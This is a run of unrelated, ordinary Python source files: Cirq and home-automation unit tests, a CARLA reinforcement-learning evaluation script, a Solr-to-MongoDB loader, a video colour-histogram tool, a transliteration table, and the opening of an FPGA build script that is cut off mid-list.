execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
with pytest.raises(ValueError, match='calibration results'):
job.calibration_results()
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_results_len(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert len(job) == 2
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_timeout(get_job):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.RUNNING),
update_time=UPDATE_TIME,
)
get_job.return_value = qjob
job = cg.EngineJob('a', 'b', 'steve', EngineContext(timeout=0.1))
with pytest.raises(TimeoutError):
job.results()
def test_str():
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
assert str(job) == 'EngineJob(project_id=\'a\', program_id=\'b\', job_id=\'steve\')'
|
from django.db import models
from django.core.urlresolvers import reverse
# Add admin Url to every content object
def get_admin_url(self):
return reverse('admin:%s_%s_change' % (self._meta.app_label, self._meta.module_name), args=[self.pk])
@classmethod
def get_class_admin_url(cls):
return reverse('admin:%s_%s_add' % (cls._meta.app_label, cls._meta.module_name))
models.Model.get_admin_url = get_admin_url
models.Model.get_class_admin_url = get_class_admin_url
|
import time
from zone_api import platform_encapsulator as pe
from zone_api.core.actions.play_music_at_dinner_time import PlayMusicAtDinnerTime
from zone_api.core.devices.activity_times import ActivityTimes, ActivityType
from zone_api.core.devices.motion_sensor import MotionSensor
from zone_api_test.core.device_test import DeviceTest, create_zone_manager
from zone_api.core.event_info import EventInfo
from zone_api.core.neighbor import Neighbor, NeighborType
from zone_api.core.zone import Zone
from zone_api.core.zone_event import ZoneEvent
class PlayMusicAtDinnerTimeTest(DeviceTest):
""" Unit tests for play_music_at_dinner_time.py. """
def setUp(self):
self.sink, items = self.create_audio_sink()
items.append(pe.create_switch_item('MotionSensor'))
self.motion_item = items[-1]
self.set_items(items)
super(PlayMusicAtDinnerTimeTest, self).setUp()
self.motion = MotionSensor(self.motion_item)
time_map = {
ActivityType.DINNER: '0:00 - 23:59',
}
self.activity_times = ActivityTimes(time_map)
self.action = PlayMusicAtDinnerTime()
def tearDown(self):
if self.action._timer is not None:
self.action._timer.cancel()
super(PlayMusicAtDinnerTimeTest, self).tearDown()
def testOnAction_noAudioSink_returnsFalse(self):
zone1 = Zone('Kitchen').add_device(self.motion).add_action(self.action)
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertFalse(value)
def testOnAction_audioSinkInZoneButNoActivityTimes_returnsFalse(self):
zone1 = Zone('Kitchen').add_device(self.sink).add_device(self.motion).add_action(self.action)
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertFalse(value)
def testOnAction_audioSinkInZone_playsStreamAndReturnsTrue(self):
zone1 = Zone('Kitchen').add_device(self.sink).add_device(self.motion) \
.add_device(self.activity_times) \
.add_action(self.action)
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertTrue(value)
self.assertEqual('playStream', self.sink._get_last_test_command())
def testOnAction_audioSinkInNeighborZone_playsStreamAndReturnsTrue(self):
zone1 = Zone('Kitchen').add_device(self.motion).add_device(self.activity_times) \
.add_action(self.action)
zone2 = Zone('great-room').add_device(self.sink)
zone1 = zone1.add_neighbor(Neighbor(zone2.get_id(), NeighborType.OPEN_SPACE_MASTER))
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1, zone2]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertTrue(value)
self.assertEqual('playStream', self.sink._get_last_test_command())
def testOnAction_audioSinkInZone_automaticallyPauseAtDesignatedPeriod(self):
self.action = PlayMusicAtDinnerTime(duration_in_minutes=0.00025)
zone1 = Zone('Kitchen').add_device(self.sink).add_device(self.motion) \
.add_device(self.activity_times) \
.add_action(self.action)
event_info = EventInfo(ZoneEvent.MOTION, self.motion_item, zone1,
create_zone_manager([zone1]), pe.get_event_dispatcher())
value = self.action.on_action(event_info)
self.assertTrue(value)
self.assertEqual('playStream', self.sink._get_last_test_command())
time.sleep(0.02)
self.assertEqual('pause', self.sink._get_last_test_command())
|
import glob
import os
import sys
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
try:
sys.path.append(glob.glob("/home/icv/.local/lib/python3.6/site-packages/")[0])
except IndexError:
pass
import carla
import time
import numpy as np
import math
import random
from collections import deque
import cv2
from tqdm import tqdm
# For rl
import gym
from gym import core, error, spaces, utils
from gym.utils import seeding
from stable_baselines import SAC
from TestScenario import CarEnv
from TestRule import IDM
EPISODES=100
class TiRLAgent(object):
def __init__(self, env):
self.env = env
load_path_rl="/home/icv/Trustworth/TiRL/models/sac-5"
log_path_rl="/home/icv/Trustworth/TiRL/data/sac-5"
self.model_rl = SAC.load(load_path_rl, env=env, tensorboard_log=log_path_rl)
load_path_rule="/home/icv/Trustworth/TiRL/models/sac_rule3"
log_path_rule="/home/icv/Trustworth/TiRL/data/sac_rule3"
self.model_rule = SAC.load(load_path_rule, env=env, tensorboard_log=log_path_rule)
self.agent_rule = IDM(env)
print("load model successfully")
self.reset()
def reset(self):
self.rule_step = 0
self.rl_step = 0
def act(self, state):
action_rl, _states = self.model_rl.predict(state,deterministic=True)
action_rule = self.agent_rule.act(state)
q_rl = self.model_rl.get_q_value([state],np.array([action_rl]))
q_rule = self.model_rule.get_q_value([state],np.array([action_rule])[None])
# print("----",float(q_rule),float(q_rl))
# action = (action_rl, action_rule)[float(q_rule)>float(q_rl)]
if q_rule > q_rl:
action = action_rule
self.rule_step = self.rule_step+1
else:
action = action_rl
self.rl_step = self.rl_step+1
return action
if __name__ == '__main__':
# Load the model
# model = load_model(MODEL_PATH)
# Create environment
env = CarEnv(random_env=False)
# Create Agent
agent = TiRLAgent(env)
# For agent speed measurements - keeps last 60 frametimes
fps_counter = deque(maxlen=60)
# Loop over episodes
for episode in tqdm(range(1, EPISODES + 1), unit='episodes'):
print('Restarting episode')
# Reset environment and get initial state
current_state = env.reset()
env.collision_hist = []
episode_reward = 0
step = 1
done = False
# Loop over steps
while True:
# For FPS counter
step_start = time.time()
action = agent.act(current_state)
new_state, reward, done, _ = env.step(action)
episode_reward += reward
# Set current step for next loop iteration
current_state = new_state
step += 1
# If done - agent crashed, break an episode
if done:
break
# Measure step time, append to a deque, then print mean FPS for last 60 frames, q values and taken action
frame_time = time.time() - step_start
fps_counter.append(frame_time)
print("Episode Reward:",episode_reward," RL Step: ",agent.rl_step," Rule Step: ",agent.rule_step)
with open("data/TiRL/RL_results.txt", "a") as result_recorder:
result_recorder.write(str(episode_reward)+' '+str(agent.rl_step)+''+str(agent.rule_step)+'/n')
agent.reset()
|
#!/usr/bin/env python3
import os, sys
import traceback
from pymongo import MongoClient
import random
from bson.objectid import ObjectId
from solr import SOLR
from solr import SOLR_CORE_NAME
class SearchSolr():
def __init__(self, ip='127.0.0.1', solr_core=SOLR_CORE_NAME):
self.solr_url = 'http://'+ ip +':8999/solr'
self.solr_core = solr_core
self.solr = SOLR(self.solr_url)
def load_data(self, select='*:*', fields=[], max_num=10, flag=False):
try:
def pro_x(x):
y = {}
y['store_id'] = x['store_id'][0]
y['category'] = x['category'][0]
y['instruction'] = x['instruction'][0]
if 'entities' in x:
y['entities'] = x['entities']
else:
y['entities'] = ['']
y['answers'] = x['answer']
y['emotion_name'] = 'null'
y['emotion_url'] = 'null'
if 'media' in x:
y['media'] = x['media'][0]
y['timeout'] = '15'
else:
y['media'] = 'null'
y['timeout'] = '0'
return y
Data = {}
def pro_y(x):
y = {}
y['store_id'] = x['store_id'][0]
y['category'] = x['category'][0]
y['intent'] = x['intent']
y['questions'] = x['question']
if 'entities' in x:
y['entities'] = x['entities']
else:
y['entities'] = ''
if y['intent']+'|'+y['entities'] in Data:
Data[y['intent']+'|'+y['entities']]['questions'].append(x['question'][0])
else:
Data[y['intent']+'|'+y['entities']] = y
return y
if flag == True:
data = [pro_x(x) for x in self.solr.query_solr(self.solr_core,
select, fields, max_num).docs]
else:
data = [pro_y(x) for x in self.solr.query_solr(self.solr_core,
select, fields, max_num).docs]
data = []
for key in Data.keys():
data.append(Data[key])
return data
except:
traceback.print_exc()
return None
class Mongodb():
def __init__(self, db_name, ip='127.0.0.1', port=27017):
self.db_name = db_name
self.db = MongoClient(ip, port)[db_name]
self.db_test = MongoClient(ip, port)[db_name+'_test']
self.solr_url = 'http://'+ ip +':8999/solr'
self.solr_core = SOLR_CORE_NAME
self.solr = SOLR(self.solr_url)
def write(self, collection, data):
try:
self.db[collection].drop()
self.db[collection].insert(data)
self.db_test[collection].drop()
self.db_test[collection].insert(data)
return 1
except:
traceback.print_exc()
return 0
def write_data2solr(self, collection):
query = 'scene_str:'+self.db_name+' AND topic_str:' +\
collection
self.solr.delete_solr_by_query(self.solr_core, query)
for x in self.db[collection].find():
data_one = x.copy()
data_one['scene'] = self.db_name
data_one['topic'] = collection
data_one['_id'] = str(data_one['_id'])
if collection in ['instruction']:
self.solr.update_solr(data_one, self.solr_core)
continue
if 'super_intention' in data_one:
if data_one['super_intention'] == '':
data_one['super_intention'] = 'null'
data_one.pop('questions')
for q in x['questions']:
data_one['question'] = q
data_one['question_ik'] = q
data_one['question_cn'] = q
self.solr.update_solr(data_one, self.solr_core)
if __name__ == '__main__':
mongo = Mongodb(db_name='bookstore')
s = SearchSolr(solr_core='instruction')
data = s.load_data(max_num=100, flag=True)
mongo.write(collection='instruction', data=data)
mongo.write_data2solr(collection='instruction')
s = SearchSolr(solr_core='automata')
data = s.load_data(max_num=100000)
mongo.write(collection='automata', data=data)
mongo.write_data2solr(collection='automata')
|
from .rates import RateManager
from .vrws import Rate, Rates, VRWSException, VRWSSOAPException,\
VRWSHTTPException, VRWSErrorException
from .tic import TICException, TICHTTPException
__all__ = ['RateManager', 'Rates', 'Rate',
'VRWSException', 'VRWSSOAPException', 'VRWSHTTPException',
'VRWSErrorException',
'TICException', 'TICHTTPException']
|
my_string = "abcba"
if my_string == my_string[::-1]:
print("palindrome")
else:
print("not palindrome")
# Output
# palindrome
|
data = (
'Ze ', # 0x00
'Xi ', # 0x01
'Guo ', # 0x02
'Yi ', # 0x03
'Hu ', # 0x04
'Chan ', # 0x05
'Kou ', # 0x06
'Cu ', # 0x07
'Ping ', # 0x08
'Chou ', # 0x09
'Ji ', # 0x0a
'Gui ', # 0x0b
'Su ', # 0x0c
'Lou ', # 0x0d
'Zha ', # 0x0e
'Lu ', # 0x0f
'Nian ', # 0x10
'Suo ', # 0x11
'Cuan ', # 0x12
'Sasara ', # 0x13
'Suo ', # 0x14
'Le ', # 0x15
'Duan ', # 0x16
'Yana ', # 0x17
'Xiao ', # 0x18
'Bo ', # 0x19
'Mi ', # 0x1a
'Si ', # 0x1b
'Dang ', # 0x1c
'Liao ', # 0x1d
'Dan ', # 0x1e
'Dian ', # 0x1f
'Fu ', # 0x20
'Jian ', # 0x21
'Min ', # 0x22
'Kui ', # 0x23
'Dai ', # 0x24
'Qiao ', # 0x25
'Deng ', # 0x26
'Huang ', # 0x27
'Sun ', # 0x28
'Lao ', # 0x29
'Zan ', # 0x2a
'Xiao ', # 0x2b
'Du ', # 0x2c
'Shi ', # 0x2d
'Zan ', # 0x2e
'[?] ', # 0x2f
'Pai ', # 0x30
'Hata ', # 0x31
'Pai ', # 0x32
'Gan ', # 0x33
'Ju ', # 0x34
'Du ', # 0x35
'Lu ', # 0x36
'Yan ', # 0x37
'Bo ', # 0x38
'Dang ', # 0x39
'Sai ', # 0x3a
'Ke ', # 0x3b
'Long ', # 0x3c
'Qian ', # 0x3d
'Lian ', # 0x3e
'Bo ', # 0x3f
'Zhou ', # 0x40
'Lai ', # 0x41
'[?] ', # 0x42
'Lan ', # 0x43
'Kui ', # 0x44
'Yu ', # 0x45
'Yue ', # 0x46
'Hao ', # 0x47
'Zhen ', # 0x48
'Tai ', # 0x49
'Ti ', # 0x4a
'Mi ', # 0x4b
'Chou ', # 0x4c
'Ji ', # 0x4d
'[?] ', # 0x4e
'Hata ', # 0x4f
'Teng ', # 0x50
'Zhuan ', # 0x51
'Zhou ', # 0x52
'Fan ', # 0x53
'Sou ', # 0x54
'Zhou ', # 0x55
'Kuji ', # 0x56
'Zhuo ', # 0x57
'Teng ', # 0x58
'Lu ', # 0x59
'Lu ', # 0x5a
'Jian ', # 0x5b
'Tuo ', # 0x5c
'Ying ', # 0x5d
'Yu ', # 0x5e
'Lai ', # 0x5f
'Long ', # 0x60
'Shinshi ', # 0x61
'Lian ', # 0x62
'Lan ', # 0x63
'Qian ', # 0x64
'Yue ', # 0x65
'Zhong ', # 0x66
'Qu ', # 0x67
'Lian ', # 0x68
'Bian ', # 0x69
'Duan ', # 0x6a
'Zuan ', # 0x6b
'Li ', # 0x6c
'Si ', # 0x6d
'Luo ', # 0x6e
'Ying ', # 0x6f
'Yue ', # 0x70
'Zhuo ', # 0x71
'Xu ', # 0x72
'Mi ', # 0x73
'Di ', # 0x74
'Fan ', # 0x75
'Shen ', # 0x76
'Zhe ', # 0x77
'Shen ', # 0x78
'Nu ', # 0x79
'Xie ', # 0x7a
'Lei ', # 0x7b
'Xian ', # 0x7c
'Zi ', # 0x7d
'Ni ', # 0x7e
'Cun ', # 0x7f
'[?] ', # 0x80
'Qian ', # 0x81
'Kume ', # 0x82
'Bi ', # 0x83
'Ban ', # 0x84
'Wu ', # 0x85
'Sha ', # 0x86
'Kang ', # 0x87
'Rou ', # 0x88
'Fen ', # 0x89
'Bi ', # 0x8a
'Cui ', # 0x8b
'[?] ', # 0x8c
'Li ', # 0x8d
'Chi ', # 0x8e
'Nukamiso ', # 0x8f
'Ro ', # 0x90
'Ba ', # 0x91
'Li ', # 0x92
'Gan ', # 0x93
'Ju ', # 0x94
'Po ', # 0x95
'Mo ', # 0x96
'Cu ', # 0x97
'Nian ', # 0x98
'Zhou ', # 0x99
'Li ', # 0x9a
'Su ', # 0x9b
'Tiao ', # 0x9c
'Li ', # 0x9d
'Qi ', # 0x9e
'Su ', # 0x9f
'Hong ', # 0xa0
'Tong ', # 0xa1
'Zi ', # 0xa2
'Ce ', # 0xa3
'Yue ', # 0xa4
'Zhou ', # 0xa5
'Lin ', # 0xa6
'Zhuang ', # 0xa7
'Bai ', # 0xa8
'[?] ', # 0xa9
'Fen ', # 0xaa
'Ji ', # 0xab
'[?] ', # 0xac
'Sukumo ', # 0xad
'Liang ', # 0xae
'Xian ', # 0xaf
'Fu ', # 0xb0
'Liang ', # 0xb1
'Can ', # 0xb2
'Geng ', # 0xb3
'Li ', # 0xb4
'Yue ', # 0xb5
'Lu ', # 0xb6
'Ju ', # 0xb7
'Qi ', # 0xb8
'Cui ', # 0xb9
'Bai ', # 0xba
'Zhang ', # 0xbb
'Lin ', # 0xbc
'Zong ', # 0xbd
'Jing ', # 0xbe
'Guo ', # 0xbf
'Kouji ', # 0xc0
'San ', # 0xc1
'San ', # 0xc2
'Tang ', # 0xc3
'Bian ', # 0xc4
'Rou ', # 0xc5
'Mian ', # 0xc6
'Hou ', # 0xc7
'Xu ', # 0xc8
'Zong ', # 0xc9
'Hu ', # 0xca
'Jian ', # 0xcb
'Zan ', # 0xcc
'Ci ', # 0xcd
'Li ', # 0xce
'Xie ', # 0xcf
'Fu ', # 0xd0
'Ni ', # 0xd1
'Bei ', # 0xd2
'Gu ', # 0xd3
'Xiu ', # 0xd4
'Gao ', # 0xd5
'Tang ', # 0xd6
'Qiu ', # 0xd7
'Sukumo ', # 0xd8
'Cao ', # 0xd9
'Zhuang ', # 0xda
'Tang ', # 0xdb
'Mi ', # 0xdc
'San ', # 0xdd
'Fen ', # 0xde
'Zao ', # 0xdf
'Kang ', # 0xe0
'Jiang ', # 0xe1
'Mo ', # 0xe2
'San ', # 0xe3
'San ', # 0xe4
'Nuo ', # 0xe5
'Xi ', # 0xe6
'Liang ', # 0xe7
'Jiang ', # 0xe8
'Kuai ', # 0xe9
'Bo ', # 0xea
'Huan ', # 0xeb
'[?] ', # 0xec
'Zong ', # 0xed
'Xian ', # 0xee
'Nuo ', # 0xef
'Tuan ', # 0xf0
'Nie ', # 0xf1
'Li ', # 0xf2
'Zuo ', # 0xf3
'Di ', # 0xf4
'Nie ', # 0xf5
'Tiao ', # 0xf6
'Lan ', # 0xf7
'Mi ', # 0xf8
'Jiao ', # 0xf9
'Jiu ', # 0xfa
'Xi ', # 0xfb
'Gong ', # 0xfc
'Zheng ', # 0xfd
'Jiu ', # 0xfe
'You ', # 0xff
)
|
from .column_append import column_append
|
#!/usr/bin/env python
import cv2
import sys
import numpy as np
import logging
from pathlib import Path
import matplotlib.pyplot as plt
import squarify
import subprocess
import argparse
from sklearn.cluster import KMeans, MiniBatchKMeans
import av
# Pixel ordering for different backends
colorformats = {
'pyav': [0,1,2], # RGB
'opencv': [2,1,0], # BGR
}
def hexcolor(rgb):
return f"#{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}"
def get_frame_types(video_fn):
command = 'ffprobe -v error -show_entries frame=pict_type -of default=noprint_wrappers=1'.split()
out = subprocess.check_output(command + [video_fn]).decode()
frame_types = out.replace('pict_type=','').split()
return zip(range(len(frame_types)), frame_types)
parser = argparse.ArgumentParser(description='Video Histogram')
parser.add_argument('vid_filename', help='Video file to process')
# Where to save output files
parser.add_argument('-d', '--output_dir', default=None, help='Output directory')
# Number of palette colors to use
parser.add_argument('-c', '--colors', type=int, default=256, help='Number of colors to use')
# Option to force regeneration of histogram
parser.add_argument('-f', '--force', action='store_true', help='Force recomputation of the histogram')
# Which backend to use (opencv or pyav)
parser.add_argument('-b', '--backend', choices=['opencv', 'pyav'], default='opencv',
help='Which backend to use (PyAV or OpenCV)')
# Only look at I-frames
parser.add_argument('-i', '--iframes', action='store_true', help='Only look at I-frames')
# Which clustering algorithm to use
parser.add_argument('-m', '--method', choices=['kmeans', 'mbkmeans'], default='mbkmeans',
help='Which clustering algorithm to use (K-Means or MiniBatchKMeans)')
# Random seed for K-Means
parser.add_argument('-s', '--seed', type=int, default=0, help='Random seed for K-Means')
# Ignore colors that are too close to black or white
parser.add_argument('-t', '--threshold', type=int, default=0, help='Ignore colors that are within this distance of black/white (Euclidean)')
# Ignore colors that are more than a particular percentage of the total
parser.add_argument('-p', '--percent', type=float, default=100.0, help='Ignore colors that are more than this percent of the video')
# Verbose flag
parser.add_argument('-V', '--verbose', action="store_const", dest="loglevel", const=logging.INFO, help='Enable info messages')
# Debug flag
parser.add_argument('-D', '--debug', action="store_const", dest="loglevel", const=logging.DEBUG, help='Enable debug messages')
args = parser.parse_args()
ClusterAlg = {
'kmeans': KMeans,
'mbkmeans': MiniBatchKMeans
}[args.method]
log_fmt = '[{levelname:<5s}] {message}'
logging.basicConfig(level=args.loglevel, format=log_fmt, style='{')
if args.percent > 100.0 or args.percent < 0.0:
parser.error('Percentage must be between 0 and 100')
vid_filename = Path(args.vid_filename)
if not vid_filename.is_file():
print("Error: File not found:", vid_filename, file=sys.stderr)
sys.exit(1)
def iter_frames(cap):
while True:
ret, frame = cap.read()
if not ret:
break
yield frame
def iter_iframes(cap):
frame_types = get_frame_types(str(vid_filename))
i_frames = [i for i, t in frame_types if t == 'I']
for i in i_frames:
cap.set(cv2.CAP_PROP_POS_FRAMES, i)
ret, frame = cap.read()
if not ret: continue
yield frame
BATCH_SIZE = 1000
def get_hist_opencv(filename, iframes=False):
def val2chars(i):
return bytes.fromhex(f"{int(i):08x}")[::-1].decode()
cap = cv2.VideoCapture(filename)
pix_fmt = val2chars(cap.get(cv2.CAP_PROP_CODEC_PIXEL_FORMAT))
fourcc = val2chars(cap.get(cv2.CAP_PROP_FOURCC))
logging.debug(
f'Opened {filename} {int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))}x{int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))} '
f'{pix_fmt} {int(cap.get(cv2.CAP_PROP_FRAME_COUNT))} '
f'{cap.get(cv2.CAP_PROP_FPS)} fps {fourcc}')
hist = np.zeros((256,256,256))
framefn = iter_iframes if args.iframes else iter_frames
i = 0
total_frames = 0
batch = []
for frame in framefn(cap):
batch.append(frame)
i += 1
if i == BATCH_SIZE:
hist += cv2.calcHist(batch, [0,1,2], None, [256,256,256], [0,256,0,256,0,256])
batch = []
total_frames += i
i = 0
if batch: hist += cv2.calcHist(batch, [0,1,2], None, [256,256,256], [0,256,0,256,0,256])
total_frames += i
logging.debug(f'Processed {total_frames} frames')
cap.release()
return hist
def get_hist_pyav(filename, iframes=False):
hist = np.zeros((256,256,256))
with av.open(filename) as container:
stream = container.streams.video[0]
logging.debug(
f'Opened {filename} {stream.codec_context.width}x{stream.codec_context.height} '
f'{stream.codec_context.pix_fmt} {stream.codec_context.encoded_frame_count} '
f'{float(stream.codec_context.framerate)} fps {stream.codec_context.codec.name}')
if iframes: stream.codec_context.skip_frame = 'NONREF'
stream.thread_type = 'AUTO'
i = 0
total_frames = 0
batch = []
for frame in container.decode(stream):
batch.append(frame.to_ndarray(format='rgb24'))
i += 1
if i == BATCH_SIZE:
hist += cv2.calcHist(batch, [0,1,2], None, [256,256,256], [0,256,0,256,0,256])
batch = []
total_frames += i
i = 0
if batch: hist += cv2.calcHist(batch, [0,1,2], None, [256,256,256], [0,256,0,256,0,256])
total_frames += i
logging.debug(f'Processed {total_frames} frames')
return hist
if args.output_dir:
hist_filename = (Path(args.output_dir) / vid_filename.name).with_suffix('.hist.npz')
else:
hist_filename = vid_filename.with_suffix('.hist.npz')
if args.force or not hist_filename.exists():
logging.info("Calculating video histogram...")
if args.backend == 'opencv':
hist = get_hist_opencv(str(vid_filename),iframes=args.iframes)
elif args.backend == 'pyav':
hist = get_hist_pyav(str(vid_filename),iframes=args.iframes)
else:
print("Error: Invalid backend:", args.backend, file=sys.stderr)
sys.exit(1)
np.savez_compressed(str(hist_filename), hist=hist)
else:
hist = np.load(str(hist_filename))['hist']
# Initial list of colors in the video
all_colors = np.argwhere(hist).astype(np.uint8)
logging.info(f"Total colors: {len(all_colors)}")
# Filter out colors that are too close to black or white
if args.threshold:
logging.info("Filtering out colors that are too close to black...")
all_colors = all_colors[np.sqrt(np.sum(np.square(np.abs(all_colors - [0,0,0])), axis=1)) > args.threshold]
logging.info(f"{len(all_colors)} colors remain")
logging.info("Filtering out colors that are too close to white...")
all_colors = all_colors[np.sqrt(np.sum(np.square(np.abs(all_colors - [255,255,255])), axis=1)) > args.threshold]
logging.info(f"{len(all_colors)} colors remain")
if len(all_colors) < args.colors:
logging.warning(f"{len(all_colors)} colors found, but {args.colors} requested. Using {len(all_colors)} instead.")
args.colors = len(all_colors)
# Use K-Means to cluster the colors
logging.info(f"Clustering to select {args.colors} dominant colors...")
kmeans = ClusterAlg(n_clusters=args.colors, random_state=args.seed,
verbose=1 if args.loglevel == logging.DEBUG else 0)
kmeans.fit(all_colors, sample_weight=hist[all_colors[:,0],all_colors[:,1],all_colors[:,2]])
palette = np.rint(kmeans.cluster_centers_).astype(np.uint8)
# Convert backend's color format to RGB
palette = palette[:,colorformats[args.backend]]
palhist = np.zeros(args.colors)
palidx = kmeans.predict(all_colors)
for color, idx in zip(all_colors, palidx):
palhist[idx] += hist[color[0], color[1], color[2]]
palhist /= palhist.sum()
# Filter out colors that are too dominant (more than a certain percentage of the video after clustering)
if args.percent < 100.0:
logging.info("Filtering out colors that are too dominant...")
before = len(palhist[palhist > 0.0])
palhist[palhist*100.0 > args.percent] = 0.0
after = len(palhist[palhist > 0.0])
logging.info(f"Palette reduced from {before} to {after} colors")
palette = palette.astype(np.float32) / 255
# Use squarify to plot the histogram using the palette colors.
# Skip any colors with zero frequency.
squarify.plot(sizes=palhist[palhist > 0], color=palette[palhist > 0])
plt.axis('off')
if args.output_dir:
vidhist_filename = (Path(args.output_dir) / vid_filename.name).with_suffix('.hist.png')
else:
vidhist_filename = vid_filename.with_suffix('.hist.png')
plt.savefig(str(vidhist_filename), bbox_inches='tight', pad_inches=0)
print(f"Saved video colors to {vidhist_filename}")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2022 F4PGA Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
import edalize
import os
work_root = 'build'
post_imp_file = os.path.realpath(os.path.join(work_root, 'post.tcl'))
os.makedirs(work_root, exist_ok=True)
synth_tool = 'vivado'
srcs = [
'lowrisc_constants_top_pkg_0/rtl/top_pkg.sv',
'lowrisc_dv_pins_if_0/pins_if.sv',
'lowrisc_prim_generic_clock_gating_0/rtl/prim_generic_clock_gating.sv',
'lowrisc_prim_generic_clock_mux2_0/rtl/prim_generic_clock_mux2.sv',
'lowrisc_prim_generic_flash_0/rtl/prim_generic_flash.sv',
'lowrisc_prim_generic_pad_wrapper_0/rtl/prim_generic_pad_wrapper.sv',
'lowrisc_prim_generic_ram_1p_0/rtl/prim_generic_ram_1p.sv',
'lowrisc_prim_generic_ram_2p_0/rtl/prim_generic_ram_2p.sv',
'lowrisc_prim_prim_pkg_0.1/rtl/prim_pkg.sv',
'lowrisc_prim_xilinx_clock_gating_0/rtl/prim_xilinx_clock_gating.sv',
'lowrisc_prim_xilinx_clock_mux2_0/rtl/prim_xilinx_clock_mux2.sv',
'lowrisc_prim_xilinx_pad_wrapper_0/rtl/prim_xilinx_pad_wrapper.sv',
'lowrisc_prim_xilinx_ram_2p_0/rtl/prim_xilinx_ram_2p.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_pkg.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_alu.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_compressed_decoder.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_controller.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_cs_registers.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_decoder.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_ex_block.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_fetch_fifo.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_id_stage.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_if_stage.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_load_store_unit.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_multdiv_fast.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_multdiv_slow.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_prefetch_buffer.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_pmp.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_register_file_ff.sv',
'lowrisc_ibex_ibex_core_0.1/rtl/ibex_core.sv',
'lowrisc_ip_flash_ctrl_pkg_0.1/rtl/flash_ctrl_pkg.sv',
'lowrisc_prim_clock_gating_0/abstract/prim_clock_gating.sv',
'lowrisc_prim_clock_mux2_0/abstract/prim_clock_mux2.sv',
'lowrisc_prim_diff_decode_0/rtl/prim_diff_decode.sv',
'lowrisc_prim_pad_wrapper_0/abstract/prim_pad_wrapper.sv',
'lowrisc_prim_ram_1p_0/abstract/prim_ram_1p.sv',
'lowrisc_prim_ram_2p_0/abstract/prim_ram_2p.sv',
'lowrisc_tlul_headers_0.1/rtl/tlul_pkg.sv',
'lowrisc_prim_all_0.1/rtl/prim_clock_inverter.sv',
'lowrisc_prim_all_0.1/rtl/prim_alert_receiver.sv',
'lowrisc_prim_all_0.1/rtl/prim_alert_sender.sv',
'lowrisc_prim_all_0.1/rtl/prim_arbiter_ppc.sv',
'lowrisc_prim_all_0.1/rtl/prim_arbiter_tree.sv',
'lowrisc_prim_all_0.1/rtl/prim_esc_receiver.sv',
'lowrisc_prim_all_0.1/rtl/prim_esc_sender.sv',
'lowrisc_prim_all_0.1/rtl/prim_sram_arbiter.sv',
'lowrisc_prim_all_0.1/rtl/prim_fifo_async.sv',
'lowrisc_prim_all_0.1/rtl/prim_fifo_sync.sv',
'lowrisc_prim_all_0.1/rtl/prim_flop_2sync.sv',
'lowrisc_prim_all_0.1/rtl/prim_lfsr.sv',
'lowrisc_prim_all_0.1/rtl/prim_packer.sv',
'lowrisc_prim_all_0.1/rtl/prim_pulse_sync.sv',
'lowrisc_prim_all_0.1/rtl/prim_filter.sv',
'lowrisc_prim_all_0.1/rtl/prim_filter_ctr.sv',
'lowrisc_prim_all_0.1/rtl/prim_subreg.sv',
'lowrisc_prim_all_0.1/rtl/prim_subreg_ext.sv',
'lowrisc_prim_all_0.1/rtl/prim_intr_hw.sv',
